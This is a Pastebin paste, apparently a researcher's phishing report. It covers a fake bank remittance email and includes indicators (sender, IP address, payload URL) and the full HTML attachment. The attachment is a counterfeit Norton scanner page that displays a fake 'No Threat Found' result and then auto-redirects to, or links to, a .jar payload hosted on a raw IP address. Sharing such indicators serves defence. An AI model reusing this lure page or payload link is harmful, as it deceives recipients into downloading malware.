API tools faq
paste
Advertisement
Neonprimetime

Norton Phish Remittance

Neonprimetime
Mar 31st, 2015
4,171
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 6.35 KB | None | 0 0
raw download clone embed print report
  1. Norton Phish Remittance
  2. Reported by neonprimetime security
  3. http://neonprimetime.blogspot.com
  4.  
  5. *****
  6. megabank.com.tw
  7. 94.242.224.181
  8. hxxp://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar
  9. *****
  10. Subject:    FW: Remittance reconfirmations
  11. From: megasing-loan@megabank.com.tw
  12. Body:
  13.  
  14. Kindly Verify the attached remittance and purpose.
  15.  
  16. CC:(Customer care) crsonline@transfast.com
  17. Date 25/04/2015
  18.  
  19. Top Urgent!
  20. From: 新加坡分行公務信箱(megasing-loan)
  21. Sent: Monday, March 30, 2015 4:42 AM
  22. To: scbonline@sc.com
  23. Subject: hello
  24.  
  25. From: 新加坡分行公務信箱(megasing-loan)
  26. Sent: Monday, March 30, 2015 4:42 AM
  27. To: scbonline@sc.com
  28.  
  29.  
  30. Subject: hello
  31. From: 新加坡分行公務信箱(megasing-loan)
  32. Sent: Monday, March 30, 2015 4:42 AM
  33. To: scbonline@sc.com
  34. Subject: hello
  35.  
  36. 「本電子訊息之內容(包括附件)係由兆豐國際商業銀行股份有限公司所傳送,該電子訊息之內容具有機密性且可能必須經由本公司之授權方可利用,因此,除了本電子訊息所指定之收件者外,任何人或公司不得就該電子訊息全部或部分之內容為審閱、傳送、散布、揭露、重製或為其他使用。若您並非所指定之收件者,請立即通知我們並請刪除該電子訊息之內容,謝謝您的合作。網路通訊可能含有病毒,收件人應自行確認本郵件是否安全。此外,該電子訊息內容可能被變更,且網際網路並不保證該電子訊息內容之完整性,因此,兆豐國際商業銀行股份有限公司對於他人變更、修改、竄改或偽造之電子訊息內容,恕不負任何責任。」「This message and its attachment(s) (hereinafter collectively referred to as 'Message') are from the MEGA International Commercial Bank. The Message is confidential and may also be privileged. Any review, retransmission, dissemination, disclosure, copying or other use of the whole or partial Message by persons or entities other than the recipient(s) as indicated in the Message is prohibited. If you are not an intended recipient, please kindly reply us immediately and delete the Message from any computer and network. We greatly appreciate your cooperation. Internet message cannot be guaranteed to be virus-free. The recipient is responsible for ensuring that this message is virus free. Besides, the Message is susceptible to alteration and can not guarantee the integrity of the Message. Therefore, MEGA International Commercial Bank shall not be liable for the Message if altered, modified, changed or falsified by any third party.」
  37.  
  38. *****
  39. ATTACHMENT (Remitance004.html)
  40. *****
  41. <html>
  42.     <head>
  43.         <title>Norton Email Security Scanner</title>
  44. <!-- here is were you place you file link-->
  45.     <META http-equiv="refresh" content="9;url=http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar">
  46.         <link rel="shortcut icon" href="http://favicon.yandex.net/favicon/buy.norton.com"/>
  47.     </head>
  48. <style type="text/css">
  49. body{
  50.     font-family: wf_segoe-ui_light, 'Segoe UI Light', 'Segoe WP Light', wf_segoe-ui_normal, 'Segoe UI', Segoe, 'Segoe WP', Tahoma, Verdana, Arial, sans-serif;
  51.     color: rgb(51, 51, 51);
  52.     font-variant: normal;
  53.     font-weight: normal;
  54.     background-color: rgb(255, 255, 255);
  55. }
  56. .placeHolder{
  57.     width:800px;
  58.     margin: 10px 0px 0px 0px;
  59.     padding: 3px 3px 3px 3px;
  60. }  
  61. .logo{
  62.     float: left;
  63.     height: 45px;
  64.     width: 103px;
  65.     padding:
  66. }
  67. .hdblk{
  68.     height: 56px;
  69.     width:800px;
  70.     margin: 30px 0px 0px 0px;
  71. }
  72. .rightSide{
  73.     float: left;
  74.     width: 397px;
  75.     margin-left: 0px;
  76.     margin-left: 40px;
  77.     font-family: wf_segoe-ui_light, 'Segoe UI Light', 'Segoe WP Light', wf_segoe-ui_normal, 'Segoe UI', Segoe, 'Segoe WP', Tahoma, Verdana, Arial, sans-serif;
  78.     color: rgb(51, 51, 51);
  79.     font-size: 30px;
  80. }
  81. #wrap{
  82.     width: 800px;
  83.     float: left;
  84.     padding: 40px 0px;
  85.     margin-left: 90px;
  86. }
  87.     #overlay{
  88.     display:none;
  89. }
  90.     #p1{
  91.     display:none;
  92. }
  93.     #d1{
  94.     display:none;
  95. }
  96. .hero-text
  97. span.btn {
  98.     display: block;
  99. }
  100. .hero-text span {
  101.     color: white;
  102.     font-weight: 900;
  103. }
  104. .btn_red {
  105.     background: none repeat scroll 0% 0% #f1c40f;
  106. }
  107. button.small, .button.small {
  108.     padding: 0.875em 1.75em 0.9375em;
  109.     font-size: 0.8125rem;}
  110.     a {
  111.     color:#FFF;
  112.     -webkit-transition: all 0.5s ease-in-out;
  113.     -moz-transition: all 0.5s ease-in-out;
  114.     transition: all 0.5s ease-in-out;
  115.  
  116.     text-decoration: none;
  117. }
  118. a:hover{
  119.     color:#FFF;
  120.     text-decoration: none;
  121.     background: #2ecc71;
  122. }
  123.  
  124. </style>
  125. <script src="http://code.jquery.com/jquery-1.11.2.min.js"></script>
  126.     <script type="text/javascript" >
  127.     var xSeconds = 7000; // 7 second timer
  128.  
  129. setTimeout(function() {
  130.    $('#overlay').fadeIn('fast');
  131.    $('#box').hide();
  132.    $('#d1').fadeIn('fast');  
  133.    $('#p1').fadeIn('fast');
  134.    $('#p2').hide();
  135.  
  136.  
  137. }, xSeconds);
  138.  
  139. </script>
  140.  
  141. <body>
  142.     <div class="placeHolder">
  143.    
  144.        
  145.         <div class="hdblk">
  146.             <div class="logo">
  147.                 <img  alt="" src="http://buy-static.norton.com/norton/ps/images/logo.gif">
  148.             </div>
  149.                 <div class="rightSide">
  150.                     <div id="p1">
  151.                         No Threat Found!!!
  152.                     </div>
  153.                     <div id="p2" >
  154.                     Norton is scanning attachment
  155.                     </div>
  156.                    
  157.                 </div>
  158.            
  159.         </div>
  160.         <div id="wrap">
  161.             <div style="width:100px; float:left; margin:20px 0px 0px 0px; padding:60px 0px;">
  162.                 <div id="box">
  163.                 <img alt="" src="http://www.arisestore.com/images/loading_animation.gif" height="100" width="100">
  164.                 </div>
  165.  
  166.                 <div id="overlay">
  167.                     <img src="http://www.moscow-langlab.ru/images/ch2.png" height="100" width="100">
  168.                 </div>
  169.             </div >
  170.             <div style="width:50px; float:left; margin:20px 0px 0px 0px; padding:60px 0px;">
  171.                 &nbsp;
  172.             </div>
  173.             <div>
  174.                 <img alt="" src="http://static.readbag.com/thumbs/07/9a/39/079a397541e3aa20e03914372e71d3a7.jpg" height="178" width="126">
  175.                 <br>
  176.                 <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  177.                     <b>Remittance004.html</b></p>
  178.                
  179.                 <div id="d1" style="margin-left:30px;">
  180.                         <span class="btn">
  181.                             <!-- on click file will be downloaded-->
  182.               <a href="http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar" class="small radius button btn_red"><b>Download</b></a>
  183.           </span>
  184.                 </div>
  185.                
  186.             </div>
  187.         </div>
  188.         <div style="margin-left:90px;">
  189.             &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>2015 symantec email security scan</strong>
  190.         </div>
  191.     </div>
  192.  
  193. </body>
  194.  
  195. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!